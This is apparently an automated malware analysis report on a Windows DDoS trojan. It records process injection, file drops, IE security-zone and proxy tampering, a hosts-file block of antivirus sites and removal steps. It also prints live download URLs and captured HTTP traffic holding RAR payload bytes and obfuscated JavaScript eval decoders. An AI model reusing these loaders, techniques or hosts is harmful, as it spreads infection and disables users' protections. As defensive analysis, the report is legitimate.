Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), DDoS.Win32.Nitol.FD, mzpefinder_pcap_file.YR, DDoSNitol.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2536732094c2c9599eda58d7feb40ffa
SHA1: 6bbd5e533f155313736b6b5532933fa01ffce621
SHA256: dc61adbc3391193e93e2f215a8940f68def389b4da6c40db4ba4029e6b1a6f1c
SSDeep: 768:JojY9PKLeWmM1gJb9MCq5L4UZoayHJojY9P:8miLeW3iV9M7ToayH8m
Size: 45056 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-06-08 12:59:36
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736
The Trojan injects its code into the following process(es):
QQExtrenal.exe:3124
svchost.exe:592
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process QQExtrenal.exe:3124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\etc\hosts (898 bytes)
The process kmokq.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÃÂÂÇÃÂÂõºÃ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÃÂÂÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (0 bytes)
%WinDir%\Temp\rbrkm.htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (0 bytes)
%WinDir%\Temp\rqckm.htm (0 bytes)
%WinDir%\Temp\rbbkm.htm (0 bytes)
The process auiay.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jarinet\QQExtrenal.exe (28 bytes)
The process regsvr32.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
The process hrl1.tmp:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\eeeaea.exe (37 bytes)
Registry activity
The process taskkill.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 08 D2 FB 94 FD AB 8F 98 AC 29 24 EC 26 BE 0D"
The process QQExtrenal.exe:3124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D0 14 E4 90 FF 3C 3D 7B 92 F8 24 71 E9 26 09"
The process kmokq.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 2F F6 14 EA 05 78 02 2B 52 48 36 B7 61 EF 55"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process auiay.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F9 8D B5 8A FE 0B 5E 5C 26 7F 38 09 54 84 34"
The process regsvr32.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 FF F2 9B 4E D6 40 84 48 CC 58 18 B0 C7 B1 92"
The process hrl1.tmp:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 D4 FF E2 C1 93 0F 10 63 F9 10 91 E3 8E AD 6E"
[HKLM\System\CurrentControlSet\Services\Nationalxwn]
"Description" = "Provideskdx a domain server for NI security."
Dropped PE files
| MD5 | File path |
|---|---|
| 9df9a9eba8026ee00bde7291adf9e9f7 | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\139869[1].exe |
| 9df9a9eba8026ee00bde7291adf9e9f7 | c:\WINDOWS\Temp\kmokq.exe |
| 0e95eca14e441eacc29fecce47be107e | c:\WINDOWS\system32\eeeaea.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 898 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | www.ijinshan.com |
| 127.0.0.1 | www.360.cn |
| 127.0.0.1 | www.rising.com.cn |
| 127.0.0.1 | www.ijinshan.com |
| 127.0.0.1 | kaba365.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\drivers\etc\hosts (898 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÃÂÂÇÃÂÂõºÃ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÃÂÂÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)
%System%\jarinet\QQExtrenal.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
%System%\eeeaea.exe (37 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2860 | 3072 | 3.84485 | c9b6b9fbded3d4764666702b145428d1 |
| .rdata | 8192 | 2505 | 2560 | 3.36056 | 6951ee1a0ff3a7f5a44727b4713506a3 |
| .data | 12288 | 672 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 16384 | 37524 | 37888 | 4.14739 | e57c1612c8a595a9ef275334498299d5 |
| .reloc | 57344 | 494 | 512 | 3.52939 | cfa8d04dd000bb30ab126902176ed40d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
405e5da7e3d520ec6da9568f2703d7e5
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.yao933.com/271342303367272317273367.rar?rkrkm | 115.238.241.109 |
| hxxp://www.zz12320.com/273312325337243270243260320307315365272317273367.rar?rbrkm | 60.190.218.179 |
| hxxp://www.86jfw.com/262306311361242341320307.rar?rbrkm | 113.17.169.8 |
| hxxp://180.ghyyy.com/322253273324264253306346.rar?rbrkm | 124.232.152.41 |
| hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rqrkm | |
| hxxp://180.ghyyy.com/322253273324264253306346.rar?rbbkm | 124.232.152.41 |
| hxxp://180.ghyyy.com/322253273324264253306346.rar?rqckm | 124.232.152.41 |
| hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rhdkm | |
| hxxp://180.ghyyy.com/322253273324264253306346.rar?rkckm | 124.232.152.41 |
| hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rnekm | |
| hxxp://www.30wz.com/.........rar?rqrkm | 183.60.200.175 |
| hxxp://www.30wz.com/.........rar?rhdkm | 183.60.200.175 |
| hxxp://180.ghyyy.com/.........rar?rbrkm | 124.232.152.41 |
| hxxp://www.yao933.com/.........rar?rkrkm | 115.238.241.109 |
| hxxp://180.ghyyy.com/.........rar?rqckm | 124.232.152.41 |
| hxxp://www.86jfw.com/.........rar?rbrkm | 113.17.169.8 |
| hxxp://180.ghyyy.com/.........rar?rbbkm | 124.232.152.41 |
| hxxp://www.zz12320.com/.................rar?rbrkm | 60.190.218.179 |
| dk.23145.com | 124.232.141.61 |
| www.sj1516.com | 61.174.41.74 |
| 623968.6600.org | 124.232.158.38 |
| www.mojimojimojimoji.com | 69.46.84.61 |
| 176.jiu75.com | 61.174.42.79 |
| 1.iqq21.com | 61.174.40.214 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ............exe..j"^yh$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&........k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c.....{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~.....s........h...f...\..A..G........?.V.....a....c.........O....A/....P...5....._......V.........#.W..&. ........n...7...........J....t.......0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F.....q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..<...........B8.)..$IH}Iw:.w...@...l.....q.GE]a...c....-fT_p"b#6...._>>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{.....o.........@...3.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.dbJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n....op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k...@.THTTP/1.1 200 OK..Content-Length: 9337155..Content-Type: application/octet-stream..Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT..Accept-Ranges: bytes..ETag: "7cee72e7991d01:29b"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Mon, 17 Nov 2014 12:11:12 GMT..Connection: keep-alive..Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ..
<<< skipped >>>
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function bvtjkXR(nJeN){var m;var R;m="";for(var d=0;d<nJeN.length;d ){R=nJeN.charCodeAt(d)^31;m =String.fromCharCode(R^30);}return m;}function nsrqnFX(){var bMlC = document.getElementById("iAyX").value;var hYqC=oqehmWE();window.location=bvtjkXR(hYqC) bMlC;}function dnnybXT(){var w="107,53,104,52,53";return eval("String.fromCharCode(" w ")");}function oqehmWE(){var w="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" w ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var zWvP=dnnybXT();document.write(bvtjkXR(zWvP));</script> </font><input id="iAyX"> <input type=button value="................" onmouseup="nsrqnFX()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function cvlmcUT(){var t="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" t ")");}function sngerDA(xLcU){var u;var M;u="";for(var g=0;g<xLcU.length;g ){M=xLcU.charCodeAt(g)^19;u =String.fromCharCode(M^18);}return u;}function qmgdjJT(){var t="107,53,104,52,53";return eval("String.fromCharCode(" t ")");}function ikxwqYV(){var qLxW = document.getEl
<<< skipped >>>
GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:25 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 98
Pragma: no-cache
Cache-control: no-store
<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))>>5)|((((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))<<3)&0xff);kp ;}";eval(kp);kp="kp=53;do{if(kp<3)break;ip[kp]=(((((ip[kp] 229)&0xff)-109)&0xff)>>3)|((((((ip[kp] 229)&0xff)-109)&0xff)<<5)&0xff);kp--;}while(true);";eval(kp);kp=1;while(kp<=51){ip[kp]=(((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))>>6)|((((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))<<2)&0xff);kp ;}jp="";for(kp=1;kp<ip.length-1;kp )if(kp%5)jp =String.fromCharCode(ip[kp]^fp);kp=eval;kp(jp);}jp="hO\x92\x19:!\x0en\x01\x1a^\x0e>6zu\x16\x0e\x02E\xc7.j\x1d1/\x01r6r\x04MrvrB\x1e\x06!\x12\xf1:\x22n\x1e\x0e&VE:Y1\xf7_\xc0 ";ep(176);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 984.Pragma: no-cache..Cache-control: no-store..<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)&g
<<< skipped >>>
GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:26 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 80
Pragma: no-cache
Cache-control: no-store
<html><body><script>var qy="/........",ry="djfz2",uy,sy=new Array(),ty;function oy(py){for(uy=0;uy<ty.length;uy )sy[uy]=ty.charCodeAt(uy);uy="uy=54;for(;;){if(uy<4)break;sy[uy]=(sy[uy]-sy[uy-1])&0xff;uy--;}";eval(uy);uy="uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy]-sy[uy 1])&0xff;uy ;}";eval(uy);uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy] sy[uy 1])&0xff;uy ;}ty="";for(uy=1;uy<sy.length-1;uy )if(uy%7)ty =String.fromCharCode(sy[uy]^py);uy=eval;uy(ty);}ty="\xa5a\r\xfe\x8e\x122;\xf8\xbeA\x8c\xab\x85*\xc8\xc7\x00\x92\x8c\xe8\xa8\x9e$\xa5\xc5\x1b\xd5\xc6\x1a5\n\xacOs\xa6X\xc9\x18\n\xe8m\x227\x9d|\xa3\x1c\xd6\x17\x9b\xed&\x11\xd9sV=\xfe";oy(20);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 766
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function crhnuUL(){var s="40,56,116,116,97,112,108,98,126,58,126,62,109,62,51";return eval("String.fromCharCode(" s ")");}function hfcnwPH(xXcG){var q;var D;q="";for(var m=0;m<xXcG.length;m ){D=xXcG.charCodeAt(m)^60;q =String.fromCharCode(D^59);}return q;}function ajwpbCS(){var s="109,51,110,50,51";return eval("String.fromCharCode(" s ")");}function ddkipIH(){var yCvO = document.getElementById("nTqP").value;var xBnV=crhnuUL();window.location=hfcnwPH(xBnV) yCvO;}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var uMqM=ajwpbCS();document.write(hfcnwPH(uMqM));</script> </font><input id="nTqP"> <input type=button value="................" onmouseup="ddkipIH()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: 